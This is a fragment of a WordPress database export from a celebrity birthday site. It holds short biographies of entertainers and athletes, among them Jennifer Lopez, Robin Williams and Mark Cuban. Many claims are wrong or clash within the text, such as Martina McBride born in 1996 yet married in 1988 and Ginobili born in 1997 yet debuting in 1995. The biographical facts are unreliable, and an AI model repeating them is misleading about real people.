14:35:10','',156,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/07/David-Hasselhoff.jpg',0,'attachment','image/jpeg',0),(158,2,'2015-07-27 07:35:32','2015-07-27 07:35:32','Born as Nicholas Nameth, Dolphin Ziggler is a famous wrestler born on July 27, 1980 in the city of Cleveland, Ohio. While he was attending Kent State University, he was an active member of wrestling team, fighting in major competitions. In 2000-2003, he won the Mid-American Athletic Conference Champion, and then his brother, Briley Pierce, followed to win the same title. In 2004 Ziggler signed a contract with WWE, and was sent to OVW (Ohio Valley Wrestling). Later on in 2005, he was brought to RAW as a sidekick for Kerwin White. Shortly afterwards, he was sent back to OVW, where he became a part of The Spirit Squad.\r\n\r\nIn 2007, Dolph Ziggler had his first breakthrough when he won <a href=\"http://www.fcwprowrestling.com/fcwhistory/fcwhistory.htm\" target=\"_blank\">FCW Florida Champions</a> twice at Florida Champions Wrestling. In 2008, he returned to WWE where he held World Heavyweight Championship a couple of times, and the WWE Intercontinental Championships. The string of success was not over yet for Ziggler; he won Money in the Bank title in 2012.\r\n<h2>Career Accomplishments</h2>\r\nDolph Ziggler has enjoyed many years of success in the wrestling world. On April 2009, he was signed to Smack Down, where he defeated Monte Vontavious Porter, the U.S. Champion, in a non-title match. After a few episodes, Ziggler started rivalry with wrestlers such as The Great Khali, whom he defeated by disqualification. On February 2010, Ziggler competed in a ladder match entitled Money in the Bank, which he won later on.\r\n\r\nIn July 2010, Ziggler earned more popularity among wrestling fans when he defeated Montel Vontavious Porter and Chavo Guerrero in a triple threat match that was meant for qualification for Money in the Bank competition. On the same month, he won WWE Intercontinental Championship by defeating Kofi Kingston for the first time. He was also able to make successful title defense against Kaval and Kingston at Survivor Series.\r\n\r\nIn November 2010, Dolph was announced by NXT as a Pro alongside Jacob Novak. Later on in the fourth season he successfully retained his Intercontinental Champions against Jack Swagger in a three-way ladder match, but later lost in January to Kingston after holding it for five months. On July 13, 2012 he and Zack Ryder were involved in a <a href=\"http://www.prowrestling.net/artman/publish/WWE/article10026230.shtml\" target=\"_blank\">car crush</a> in San Diego as they drove from Comic-On, but none of them had any serious injuries.\r\n<h2>Most Known for</h2>\r\nDolph Ziggler is a famous wrestler most known for his role in the <a href=\"http://www.wwe.com/\">WWE</a> and Smack Down. He has won many tiles, including intercontinental Championship by defeating a veteran, Kofi Kingston. He has also won Money in the Bank title in a ladder match.\r\n<h2>Current Personal Life</h2>\r\nZiggler has been a big fan of professional wresting since the age of five, not knowing that he would once become a famous wrestler in history. In May 2015, he started a relationship with the former Rusev’s manager, Lana, when she appeared at one of his matches and kissed him. Since then she has accompanied him during all his matches.\r\n<h2>Where is he now</h2>\r\nPresently Dolph Ziggler lives in <a href=\"http://www.visitphoenix.com/index.aspx\" target=\"_blank\">Phoenix, Arizona</a> in a beautiful mansion. He still wrestles in major competitions, hoping to win more titles this year. He says that he wants to win the World Heavy Weight Championship.\r\n\r\n[<a href=\"https://www.flickr.com/photos/ohhsnap_me/13773108604/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Dolph Ziggler','','publish','open','open','','dolph-ziggler','','','2015-10-09 19:14:28','2015-10-09 19:14:28','',0,'http://birthdaypedia.wpengine.com/?p=158',0,'post','',0),(159,2,'2015-07-17 14:45:40','2015-07-17 14:45:40','','Dolph Ziggler','','inherit','open','open','','dolph-ziggler','','','2015-07-17 14:45:45','2015-07-17 14:45:45','',158,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/07/Dolph-Ziggler.jpg',0,'attachment','image/jpeg',0),(160,2,'2015-07-15 07:46:08','2015-07-15 07:46:08','Producer, actor and director, <a href=\"http://www.filmindependent.org/about/board-of-directors/forest-whitaker/#.VakXvfl_NBc\" target=\"_blank\">Forest Whitaker</a> was born on July 15, 1961 in the city of Longview, Texas. He was a college soccer player who would later turn to studying drama and opera. In high school he was a quarterback, which later saw him land a scholarship to play for California State University. He suffered injury for a long time and later transferred to University of South California, where he studied drama and opera.\r\n\r\nForest made his debut film in 1982 when he was featured in a comedy known as Fast Times at Ridgemont High together with Sean Penn and Nicholas Cage. The versatile actor later appeared in several acclaimed movies throughout the 80’s, which include The Color of Money in and Platoon in 1986, and Vietnam in 1987. His role in the film industry saw him get awarded at the Cannes Film Festival for the best Actor Award.\r\n<h2>Career Accomplishments</h2>\r\nWhitaker has had a long history of success, having worked with renowned film directors as well as fellow actors such as 50 Cent, Maggie Grace and Lil Wayne. His career began to sprout in 1988 when he played a role in the famous film <a href=\"http://www.historyvshollywood.com/reelfaces/bloodsport.php\" target=\"_blank\">Bloodsport</a>, which also features Jean-Claude Van Damme. His performance earned him an award at the <a href=\"http://www.festival-cannes.com/\" target=\"_blank\">Cannes Film Festival</a> as well as a Golden Globe Nomination. Forest did not stop there; he continued to work with big names in the industry throughout the 90s. In a 1990 he was featured in a film known as Downtownwith Penelope Ann Miller and Anthony Edwards. Later on, Neil Jordan decided to cast him an important role of Jody, a British solider who was held captive in the film The Crying Game.\r\n\r\nForest soon expanded to directing and producing, having specific interest in Television. He worked in projects such as the 2002 Emmy-Winning Door to Door, which starred William H. Macy, and Strapped for HBO. His major success came in 2006 when he won an Oscar Award for his powerful performance in the Movie The Last King of Scotland. His role as the dictator Idi Amin also earned him many accolades, such as Academy Award for the Best Actor.\r\n<h2>Most Known For</h2>\r\nWhitaker is best known for his role in the film industry since the early 80’s. Many people know him for his incredible performance in the film <a href=\"http://www.vudu.com/movies/#!overview/70133/The-Last-King-of-Scotland\" target=\"_blank\">The Last King of Scotland</a>, where he takes up the role of Dictator Idi Amin.\r\n<h2>Current Personal Life</h2>\r\nIn 1996, Forest Whitaker married his longtime girlfriend Keisha Nash, with whom he has 2 daughters. He also has a daughter and a son from previous relationships. He also works with various charitable organizations worldwide, giving back to the community.\r\n<h2>Where is he now</h2>\r\nToday Whitaker and his lovely wife live near his retired parents in Los Angeles. He has not abolished his interest in film making. Currently he is working on projects and is actively involved in directing and producing films. He operates a company known as Spirit Dance Entertainment, which includes music production, television and film.\r\n\r\n[<a href=\"https://www.flickr.com/photos/stephenpoff/2240668633/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Forest Whitaker','','publish','open','open','','forest-whitaker','','','2015-10-14 18:30:13','2015-10-14 18:30:13','',0,'http://birthdaypedia.wpengine.com/?p=160',0,'post','',0),(161,2,'2015-07-17 14:53:22','2015-07-17 14:53:22','','Forest Whitaker','','inherit','open','open','','forest-whitaker','','','2015-07-17 14:53:28','2015-07-17 14:53:28','',160,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/07/Forest-Whitaker.jpg',0,'attachment','image/jpeg',0),(162,2,'2015-07-24 08:53:52','2015-07-24 08:53:52','Jennifer Lopez was born on July 24, 1969 in <a href=\"http://www.tripadvisor.com/Tourism-g47369-Bronx_New_York-Vacations.html\" target=\"_blank\">Bronx, New York</a>. Eventually to become one of the most renowned actor and musician, Jennifer started her career dancing in a number of music videos and stages. She was very good at what she did, which saw her win a national competition, earning a dancing spot on In Living Color, a popular comedy series that was being aired by FOX. A string of small jobs then followed, which included parts in a TV movie entitled Nurses on the Line, and 2 more series.\r\n\r\nEven though Lopez was being featured in various movies, series and TV shows, she didn’t feel that she had her big break yet. In 1997, her career sprouted when she was offered an important role to play in the film Selena. It was her performance in the film that earned her widespread praise, not to mention a Golden Globe nomination. Better still, she was named as the highest-paid actress not only in her country, but also in history, being offered 1 million dollars. That same year she also enjoyed numerous contracts, including roles in the famous movies Blood and Wine, <a href=\"http://www.imdb.com/title/tt0118615/fullcredits/\" target=\"_blank\">Anaconda</a> and Out of Sight.\r\n<h2>Career Accomplishments</h2>\r\nHaving worked very hard to earn her popularity, Lopez decided to try new things and venture to music as she was also very talented on the same. Her career as an artist also began to take off with her debut pop album in 1999. One of the singles in the album, If You Had My Love, fueled her success, as it went premium within just two weeks. It saw her together with Rick Martin become two of the most influential artists of the Latin culture was fast growing in pop music.\r\n\r\nOne year later (2000), Jennifer was nominated along other artists for Best Dance Performance thanks to her hit single, Waiting for Tonight, but unfortunately she lost the award to Cher. That same year in summer, she starred in a film known as Enough, which portraying spousal abuse, and The Cell, a science fiction-thriller. In 2001 her popularity reached new heights when she earned number one spot on many pop charts thanks to her album, J.Lo. As if that wasn’t enough, her film, <a href=\"http://www.rottentomatoes.com/m/wedding_planner/\" target=\"_blank\">The Wedding Planner</a>, then shot to the top at the Box office, only a week after being released.\r\n<h2>Most Known for</h2>\r\nSinger, dancer and actress Jennifer Lopez is definitely one of the leading ladies in Hollywood. She is known to have great talent, especially when it comes to acting and singing. Most people know her for her hit single if you Had My Love, and the Movies The wedding Planner and Anaconda.\r\n<h2>Current Personal Life</h2>\r\nIn 1997, Jennifer was briefly married to Ojan Noa, an actor and model. Thereafter, she then had a widely publicized and lengthy relationship with Sean Combs, a rapper, which also ended. Lopez didn’t give up; she went ahead to date, getting engaged and later married to a dancer known as Chris Judd. Nine months down the line the couple separated and Lopez moved on and married <a href=\"http://www.eonline.com/news/593024/jennifer-lopez-admits-she-s-felt-abused-in-past-relationships-reveals-the-moment-she-decided-to-divorce-marc-anthony\" target=\"_blank\">Marc Anthony</a>, a singer. The relationship didn’t fair well too and they broke up in 2014. She currently has two children (twins): Maximillan David Muniz and Emme Maribel Muniz,\r\n<h2>Where is she now</h2>\r\n<a href=\"http://www.jenniferlopez.com/\" target=\"_blank\">Jennifer Lopez</a> lives in Bel-Air, California, a home she acquired with Marc Anthony. They also have a house in Long Island, New York and another in Fisher Island.\r\n\r\n[<a href=\"https://www.flickr.com/photos/anakley/7444315318/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Jennifer Lopez','','publish','open','open','','jennifer-lopez','','','2015-10-09 19:21:27','2015-10-09 19:21:27','',0,'http://birthdaypedia.wpengine.com/?p=162',0,'post','',0),(163,2,'2015-07-17 15:05:27','2015-07-17 15:05:27','','Jennifer Lopez','','inherit','open','open','','jennifer-lopez','','','2015-07-17 15:05:33','2015-07-17 15:05:33','',162,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/07/Jennifer-Lopez.jpg',0,'attachment','image/jpeg',0),(164,2,'2015-07-28 07:05:53','2015-07-28 07:05:53','Born Emanuel David Ginobili, <a href=\"https://en.wikipedia.org/wiki/Manu_Gin%C3%B3bili\" target=\"_blank\">Manu Gobili</a> is one of the most celebrated NBA stars born on July, 1997 in the city of Bahia Blanca, Argentina. He was the youngest in a family of three, and known to be a small, skinny kid. No one thought that he would later rise to basket stardom globally, although the sport was in his blood. His brothers, Sebastian and Leonard, usually attended training for del Notre, an excellent basketball team in those days, and Manu tagged along for practice and games. This led him to grow his interest in playing basketball, and later started training with a coach called Oscar Sanchez.\r\n\r\nGinobili watched the NBA every time he had a chance, staying up till late hours to catch them. He marveled at one of his idols’, Michael Jordan, talent and creativity by watching him lead his <a href=\"http://www.nba.com/bulls/\" target=\"_blank\">Chicago Bulls</a> teammates to win 6 NBA championships. By the time he reached his teenage life, the separation between him and the court became a chasm. Just like his idol, he made incredible shots and had the ability to dunk with precision and great flair. At the age of 18, he made his debut with Andino in the 1995-1996 season.\r\n<h2>Carreer Acomplishments</h2>\r\nGinobili’s rapid ascent helped him attract attention of major European scouts, who offered him a contract to play for Viola Geggio Calabria located in Italy. By playing in international leagues, his game continued to improve with every season, averaging to about 16.9 points per game. However, he did more than score in his time in Europe. Thanks to his wonderful feel for the game, he worked hard and even took up the offensive end. This saw him given the title of Italian League Player of the Year.\r\n\r\nIt was in Europe where Ginobili began honing his talent to what would later become his NBA calling. His first 2 years in Italy seemed to open eyes around the world of basketball, including the <a href=\"http://www.nba.com/spurs/\" target=\"_blank\">San Antonio Spurs</a>. The clubs coach, R.C Bufford, was impressed with his performance, and he didn’t waste the opportunity to grab him, beating 57 other competitors. The spurs hoped that Manu would in a few years mature to become a solid player, which he did. In July, 2001, he signed a contract with the team, which saw him pocket an amazing $2.9 million. He helped the Spurs as well as his country win a number of titles, making a mark for himself for every game he played.\r\n<h2>Most Known For</h2>\r\nManu Ginobili is a top basketball player known for his impeccable talent. In the early 2000s, he helped the San Antonio Spurs as well as Argentina, his home country, win many titles. In fact, he is the only player in the world to ever win an Olympic Gold Medal, NBA ring, and a Euro league. Manu is best known for his role in as a Shooting Guard in the San Antonio Spurs from 2000 till date.\r\n<h2>Current Personal Life</h2>\r\nManu Ginobili is a very rich man. He agreed to sign with the Spurs to a two-year deal, which will see him extend his contract to 2015 for $14.5 million. In 2004 he married Marianela Orono and got twins 6 years later (2010).\r\n<h2>Where is he now</h2>\r\nManu owns a house at Hillside Estate, Northwest of San Antonio. He also owns a summer home located in South <a href=\"http://www.lonelyplanet.com/argentina/buenos-aires\" target=\"_blank\">Buenos Aires, Argentina</a>.\r\n\r\n<a href=\"https://www.flickr.com/photos/nico_/14868835014/sizes/c/\" target=\"_blank\">Image credit</a>\r\n\r\n \r\n\r\n ','Manu Ginobili','','publish','open','open','','manu-ginobili','','','2015-10-09 19:12:20','2015-10-09 19:12:20','',0,'http://birthdaypedia.wpengine.com/?p=164',0,'post','',0),(165,2,'2015-07-31 07:14:24','2015-07-31 07:14:24','Born on July 31, 1958, <a href=\"http://www.forbes.com/profile/mark-cuban/\" target=\"_blank\">Mark Cuban</a> is a sports team owner and entrepreneur based in the United States. Although he had a middle-class childhood, he inherited from his grandfather a tenancy for making deals, so that he could carve out a better life. This was very evident at the age of 12 when he started selling sets of garbage bags in order to save up some money for a pair of shoes. When he was in high school, his entrepreneurial skills were also more evident, as he could earn some extra dollars any way possible, especially by becoming a coin and stamp salesman.\r\n\r\nMark’s go-getter attitude was not always outside school; it extended to the classroom too. He attended University of Pittsburgh Cuban before transferring to Indiana University, where he understood better issues to do with supply and demand. He was paying his tuition by hosting lavish parties at Bloomington National Guard armory.\r\n<h2>Career Accomplishments</h2>\r\nAfter Mark graduated in 1981, he moved back to his home town in Pittsburgh, where he started working with a company known as Mellon Bank. He utilized his time wisely by learning all he could about networking and machines, and then left for Dallas in 1982. In Texas he landed another job to sell software, but realized he could do better by forming his own consulting firm known as MicrosSolutions. Within a few years, Mark was an expert in computer networking and computers in general. He sold his firm for an incredible 6 million dollars to investors.\r\n\r\nHowever, even after selling his company his fortune making was far from over. Seeing that the future of the world relied on internet, he and a business partner known as Todd Wagner started <a href=\"http://www.audionetamerica.com/\" target=\"_blank\">AudioNet</a>, a company that was aimed at helping people listen to basketball games online. Despite critics the firm proved to be a great success, before the duo decided to sell it to Yahoo! In 2000, Cuban went ahead to show his entrepreneurial skills when he purchased a basketball team, Dallas Mavericks, for 285 million dollars from Ross Perot. With his trademark doggedness and enthusiasm, Mark revamped the team’s culture, pampering his players as well as erecting a new stadium. He was the biggest booster of the club. The team made surprise qualification in 2001 for the playoffs, setting a record of 57 wins the following year.\r\n<h2>Most Known for</h2>\r\nMark Cuban is an entrepreneur and the owner of <a href=\"http://www.mavs.com/\" target=\"_blank\">Dallas Mavericks</a> basketball team. He has been a business-minded person since he was young, something which was evident when he paid his tuition fees while still in University. Today he is known as a successful businessman, mostly interested in basketball world.\r\n<h2>Current Personal Life</h2>\r\nIn 2002, Mark married Tiffany Stewart, his longtime girlfriend. Together they have two children. Over the last one decade, he has appeared in Forbes 400 richest people in America with an estimated 1.9 billion dollars in net worth. He is also the co-owner and chairman of Magnolia Pictures alongside Todd Wegner.\r\n<h2>Where is he now</h2>\r\nMark lives with his family in Dallas, Texas. He used to admire big houses when he was young and imagine that one day he would live there. Today, he lives in a big mansion with his wife and kids. He still owns Dallas Mavericks and interested in other business ventures.\r\n\r\n[<a href=\"https://www.flickr.com/photos/jdlasica/8761110856/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Mark Cuban','','publish','open','open','','mark-cuban','','','2015-10-09 18:38:44','2015-10-09 18:38:44','',0,'http://birthdaypedia.wpengine.com/?p=165',0,'post','',0),(166,2,'2015-07-17 15:21:55','2015-07-17 15:21:55','','Mark Cuban','','inherit','open','open','','mark-cuban','','','2015-07-17 15:21:59','2015-07-17 15:21:59','',165,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/07/Mark-Cuban.jpg',0,'attachment','image/jpeg',0),(167,2,'2015-07-29 07:22:42','2015-07-29 07:22:42','Country singer and artist, <a href=\"http://martinamcbride.com/\" target=\"_blank\">Martina McBride</a> was born in 1996 in the city of Kansas. She grew up on a dairy farm together with her sister and two brothers. Through The Schiffters, her father’s band, she became more interested in country music, especially how the members sang and played keyboard at local gigs. After finishing her high school, she headed to collage before she eventually realized she was interested in singing.\r\n\r\nEven though Martina was incredibly talented, she didn’t start easy. She began by performing odd jobs such as selling T-shorts to fans at Garth Brooks’ concerts. Her patience finally paid off when she caught Brooks’ attention in 1990. She was offered a chance to perform as his opening act, signing a contract with RCA right before the tours started. In 1992, Martina decided to try it out on her won, and she released her debut album known as The Time Has Come. This followed yet another album in 1993 known as The Way That I Am, which included a hit single, My Baby Loves Me, which rose straight to number 2 on music charts.\r\n<h2>Career Accomplishments</h2>\r\nAs years went by, Martina released a string of new hits that made her very popular. In fact, in 1995 she released Wild Angels, a hit that rose to number one single in music charts. Her next album in 1997, Evolution, became a double-platinum record, bringing her a string of hits such as Wrong Again, A Broken Heart, Happy Girl, and Valentine. These singles earned her the much-needed critical acclaim, leading her to an award for the Best female Vocalist of The year. In 1999 she was among the few artists who were chosen to perform for the then president, Bill Clinton.\r\n\r\nSuccess seemed to be following Martina wherever she went. In 2002 she was again offered an award for the <a href=\"http://www.thetoptens.com/best-female-country-singers/\" target=\"_blank\">Best Female Vocalist</a> thanks to her album, Greatest Hits. The success of singles in the album caught the attention of country music organizations, such as Academy of Country Music and Country Music Association, who went ahead to award her the Top Vocalist Trophy in 2003. In 2007 Martina returned to the studios, creating her next album, Waking Up Laughing, which saw her nominated for Female Vocalist of the Year again in 2009.\r\n<h2>Most Known for</h2>\r\nMartina MacBride is one of the most celebrated country music singers in the U.S. She started by selling T-shirts at Brook’s concert but ended up as one of the best singers; having won The Best Female Vocalist of The Year awards a couple of times. She is famous for hits such as My Baby Loves Me, Wrong Again, A Broken Heart, Happy Girl, and Valentine.\r\n<h2>Current Personal Life</h2>\r\nAside from music and fame, Martina also works with a number of charities in the U.S and around the world. She has been a spokeswoman for <a href=\"http://nnedv.org/about.html\" target=\"_blank\">National Network to End Domestic Violence</a> and National Domestic Violence Hotlines. Since May 15, 1988 she has been married to John McBride, a sound engineer, with whom she has three daughters namely: Delaney Katharine, Emma Justine, and Ava Rose Kathleen.\r\n<h2>Where is she now</h2>\r\nMartina MacBride currently lives with her husband and children in Nashville, Tennessee. Besides working on more hits, she is also involved in various charities. Her husband is the owner of Blackbird Studios located in Berry Hill, Nashville.\r\n\r\n[<a href=\"https://www.flickr.com/photos/tncountryfan/6076583046/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Martina McBride','','publish','open','open','','martina-mcbride','','','2015-10-09 19:11:54','2015-10-09 19:11:54','',0,'http://birthdaypedia.wpengine.com/?p=167',0,'post','',0),(168,2,'2015-07-17 15:29:38','2015-07-17 15:29:38','','Martina McBride','','inherit','open','open','','martina-mcbride','','','2015-07-17 15:29:43','2015-07-17 15:29:43','',167,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/07/Martina-McBride.jpg',0,'attachment','image/jpeg',0),(169,2,'2015-07-21 08:30:05','2015-07-21 08:30:05','<a href=\"http://www.biography.com/people/robin-williams-9532797\" target=\"_blank\">Robin McLaurin Williams</a> is a Comedian and actor born on July 21, 1951 in the city of Chicago, Illinois. Finally becoming one of the funniest performers in the U.S., Robin attended College of Marin and Clermont Men’s College before going to Julliard School in New York. After finishing school he started to work on TV programs such as Eight is Enough, Laugh-in, and The Richard Pryor Show. He became widely known as the alien Mork and later debuted on Happy Days series.\r\n\r\nWilliams saw that he could do well on his own, which prompted him to start his own show known as Mork& Mindy. However, this wasn’t his biggest breakthrough. His career took a turn when he made his big-screen debut in 1980, taking the lead role in Popeye, a film directed by the one Robert Altman. A string of film roles then followed over the years, where he showcased his talent and his ability in the film industry.\r\n<h2>Career Accomplishments</h2>\r\nAs his career took off, Robin faced a number of challenges. It was reported that he developed alcohol and drug problem while he was working on Mork and Mindy, Which saw him struggle for over two decades. Despite all the personal setbacks, he did not give up. He continued with his acting career, appearing in Awakening, a hit drama with Julie Kavner and Roberto De Niro. His role in The Fisher King, a redemptive drama, where he stared as a homeless man saw him received an Oscar nomination. He also starred in 1991 Hook, animated film Aladdinm Flubber, Jumangi, and Doubtfire.\r\n\r\nWhile Robin Williams was best known for his thrilling humor, he was also seen to explore darker situations and characters on screen. In a 2002 film, One Hour Photo, he took up the role of a creepy photo developer and a writer of novels in the film Insomnia the same year. In 2006, Robin returned to his comic talent, featuring in the film <a href=\"https://en.wikiquote.org/wiki/Man_of_the_Year\" target=\"_blank\">Man of The Year</a> in 2006 and Night at the Museum.\r\n\r\nIn late 2008, Williams tried stand-up comedy known as <a href=\"http://www.hbo.com/comedy/robin-williams-weapons-of-self-destruction\" target=\"_blank\">Weapons of Self Destruction</a>, which focused on social as well as political absurdities. He was seen to pour all his energy into his show, but health problems derailed him in 2009, causing him to undergo heart surgery. As he was recovering, he once again took up a role in the film Old Dogs alongside John Travolta.\r\n<h2>Most Known For</h2>\r\nRobert Williams is best known for his thrilling humor in a number of comedy movies and shows. He is particularly known for his fast-paced performance style in films such as <a href=\"http://www.nytimes.com/movie/review?res=950DE0DE1F31F931A35755C0A96F948260\" target=\"_blank\">Dead Poets Society</a> and Good Will Hunting. Other films that he has starred include Awakening, The Fisher King, Hook, Alladin, and Mrs. Doubtfire.\r\n<h2>Current Personal Life</h2>\r\nOn August 11, 2014, it was reported that the 63-year old comedian and actor was found dead in his home in California. It is believed that he was battling severe depression, which led to his sudden and tragic death. According to forensic examination, it was revealed that Williams died from asphyxia.\r\n\r\n[<a href=\"https://www.flickr.com/photos/fallkniven/15084098476/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Robin Williams','','publish','open','open','','robin-williams','','','2015-10-14 18:44:12','2015-10-14 18:44:12','',0,'http://birthdaypedia.wpengine.com/?p=169',0,'post','',0),(170,2,'2015-07-17 15:37:45','2015-07-17 15:37:45','','Robin Williams','','inherit','open','open','','robin-williams','','','2015-07-17 15:37:50','2015-07-17 15:37:50','',169,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/07/Robin-Williams.jpg',0,'attachment','image/jpeg',0),(171,2,'2015-07-22 07:38:15','2015-07-22 07:38:15','<a href=\"http://www.selenagomez.com/\" target=\"_blank\">Selena Gomez</a> was born on July 22, 1992 in the City of Grand Prairie, Texas. She had her first taste of fame in 2001 when she was offered a two-year run on Barney and Friends, a kids’ show. After two years working with the kids show, she was dropped, something that proved quite disheartening as she could audition for other shows without much success. Luckily, in 2003 she landed a role in Spy Kids 3-D and another small part in the movie Trial by Fire: Walker, Texas Ranger, where she took up the role of Julie.\r\n\r\nThings finally became better for Selena in 2006 when she was offered to star in the show, The Suite of Zack & Cody, which was aired on Disney Channel. She did well, which saw her land another part in Hanna Montana, acting as the evil Mikalya. In 2007 the Disney channel decided to cast her in the series known as <a href=\"https://en.wikipedia.org/wiki/Wizards_of_Waverly_Place\" target=\"_blank\">Wizard of Waverly Place</a> that later became very popular and ran until the year 2012.\r\n<h2>Career Accomplishments</h2>\r\nSelena Gomez has had very successful years in the entertainment industry, especially after the proved herself as a great actor and musician. In 2008, she landed a role in Horton Hears a Who!, her first animated movie. Later on she starred in various movies such as Another Cinderella Story by ABC, The Princess Protection Program, and Wizard of Waverly Place.\r\n\r\nWhen it came to music, Selena was also strong. She recorded her debut album with Hollywood Records entitled kiss and Tell. In the animated movie Hotel Transylvania that was released in 2012, she was offered a part to perform the voice of Mevis. Although most of her work in music didn’t bear much fruit as she expected, in summer 2015 she eventually made it to the charts with her single song, Good For You.\r\n<h2>Most Known for</h2>\r\nBeing a fixture in Disney Universe, Selena Gomez is a great actor and musician, who has proven to be very persistent and talented in everything she does. She is best known for her work in TV shows, music and movies, especially her role as Alex the wizard in Wizard of Waverly Place, Horton Hears a Who!, Another Cinderella, and The Princess Protection Program. This year she released a hit single, Good For You, which made it to top charts in the US.\r\n<h2>Current Personal Life</h2>\r\nOutside singing and acting, Selena also serves as a spokesperson for the brand Borden Milk. She appears in both print ads and advertising campaign of the organization. She is also a longtime supporter of the non-governmental organization <a href=\"http://www.unicefusa.org/\" target=\"_blank\">UNICEF</a>, taking up the role of ambassador in early 2009. Since 2014, reports surfaced that Selena had been suffering from an autoimmune disease, Lupus, that’s known for causing joint pain, headaches and fatigue.\r\n<h2>Where is she now?</h2>\r\nIn 2014 Serena Gomez bought a mansion worth $3 million in Los Angels, California. It was reported that shed took that move so that <a href=\"http://www.lifeandstylemag.com/posts/justin-bieber-slams-romance-rumors-with-selena-gomez-says-i-m-single-63366\" target=\"_blank\">Justin Bieber</a> could move in with her. Her house is just a few yards away from Kendall Jenner.\r\n\r\n[<a href=\"https://www.flickr.com/photos/ellasportfolio/8228618996/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Selena Gomez','','publish','open','open','','selena-gomez','','','2015-10-14 18:44:20','2015-10-14 18:44:20','',0,'http://birthdaypedia.wpengine.com/?p=171',0,'post','',0),(172,2,'2015-07-17 15:45:35','2015-07-17 15:45:35','','Selena Gomez','','inherit','open','open','','selena-gomez','','','2015-07-17 15:45:40','2015-07-17 15:45:40','',171,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/07/Selena-Gomez.jpg',0,'attachment','image/jpeg',0),(173,2,'2015-07-16 08:45:58','2015-07-16 08:45:58','<a href=\"https://en.wikipedia.org/wiki/Will_Ferrell\">John W. Ferrell</a> was born on July 16, 1967 in the city of Irvine, California. He was the oldest son of Lee Ferrell, a famous keyboard player, and teacher Kay Ferrell. Studious, and sometimes, a little quiet, Will chose to be involved more in the football pitch, where he set a record at the school for most goals ever scored. He lived in a suburb home, but he continuously displayed funny outburst, not knowing that it later would define his career.\r\n\r\nA glimpse of his talent showed at high school, where he used to disguise his voice each morning to make daily announcements over public address system. In 1986 when he graduated, Ferrell chose to go to University of Southern California in order to pursue his dream in sports journalism. When he graduated in 1989, he got his first taste of television at NBC, where he worked as an intern for the sports department.\r\n<h2>Career Accomplishments</h2>\r\nIn the beginning Will’s attempt at standup comedy did not prove much success, but when he realized that he could impersonate people, such as the Hall of Fame baseball announcer Harry Carry, he began to create more original characters. He started receiving small roles like TV series <a href=\"http://tvtropes.org/pmwiki/pmwiki.php/Series/LivingSingle\" target=\"_blank\">Living Single</a> and Grace Under Fire, and low budget films and commercials. His career took a turn in 1994 when he was offered a role with The Groundings, the top professional group.\r\n\r\nIn 1994 -1995 the SNL’s declined in popularity and there was need to have new cast members to be featured in the coming season. So a producer watched The groundings and asked Cheri Oteri, Kattan and Ferrell to audition. In 1995 he succeeded and was offered a spot in <a href=\"http://www.nbc.com/saturday-night-live/cast/will-ferrell-15141\" target=\"_blank\">Saturday Night Live</a>, where he worked until 2002. During that time Will made a good name for himself, especially by impersonating Janet Reno, U.S. Attorney General; George W. Bush, the U.S. President; and singer Notorious BIG. Ferrell was then flooded with numerous movie offers, such Talladega Nights, Step brothers, and Blades of Glory.\r\n<h2>Most Known For</h2>\r\nWill Ferrell is mostly known for his role in the comedy scene, especially his talent in impersonating musicians, commentators and politicians. He, however, came to fame when he was offered a role as a cast member on the show Saturday Night Live. Some of the films that he’s is best known for include ABC’s Grace Under Fire and Fox’s Living Single.\r\n<h2>Current Personal Life</h2>\r\nFerrell married his longtime girlfriend Viveca Paulin, a Swedish actress, in August 2000. They have three sons namely: Magnus Paulin Ferrell, Mattias Paulin Ferrell, and Alex Paulin Ferrell. He loves to watch <a href=\"http://www.usctrojans.com/sports/m-footbl/sched/usc-m-footbl-sched.html\" target=\"_blank\">USC Trojan football</a> and he has worked with Pete Carroll, the head coach, to do motivational stunts that are aimed to help players during the season.\r\n<h2>Where is he now</h2>\r\nToday Ferrell lives with his dear wife and children in New York City. They also have a home in Orange County where they all spend time together. He is involved in charitable work, raising money for Cancer survivor’s campaign through a fundraising platform.\r\n\r\n[<a href=\"https://www.flickr.com/photos/zonalpony/3543253665/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n \r\n\r\n ','Will Ferrell','','publish','open','open','','will-ferrell','','','2015-10-14 18:31:05','2015-10-14 18:31:05','',0,'http://birthdaypedia.wpengine.com/?p=173',0,'post','',0),(174,2,'2015-07-17 15:54:28','2015-07-17 15:54:28','','Will Ferrell','','inherit','open','open','','will-ferrell','','','2015-07-17 15:54:33','2015-07-17 15:54:33','',173,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/07/Will-Ferrell.jpg',0,'attachment','image/jpeg',0),(175,2,'2015-07-23 22:36:15','2015-07-23 22:36:15','','Pamela Anderson','','inherit','open','open','','pamela-anderson','','','2015-07-23 22:36:34','2015-07-23 22:36:34','',134,'http://birthdaypedia.com/wp-content/uploads/2015/07/Pamela-Anderson.jpg',0,'attachment','image/jpeg',0),(176,2,'2015-07-23 23:04:38','2015-07-23 23:04:38','','Tom Cruise','','inherit','open','open','','tom-cruise-2','','','2015-07-23 23:05:43','2015-07-23 23:05:43','',138,'http://birthdaypedia.com/wp-content/uploads/2015/07/Tom-Cruise.jpg',0,'attachment','image/jpeg',0),(177,2,'2015-07-23 23:10:20','2015-07-23 23:10:20','','Singer 50 Cent','','inherit','open','open','','singer-50-cent','','','2015-07-23 23:10:35','2015-07-23 23:10:35','',139,'http://birthdaypedia.com/wp-content/uploads/2015/07/Singer-50-Cent.jpg',0,'attachment','image/jpeg',0),(179,2,'2015-07-23 23:22:15','2015-07-23 23:22:15','','Toby Keith','','inherit','open','open','','toby-keith','','','2015-07-23 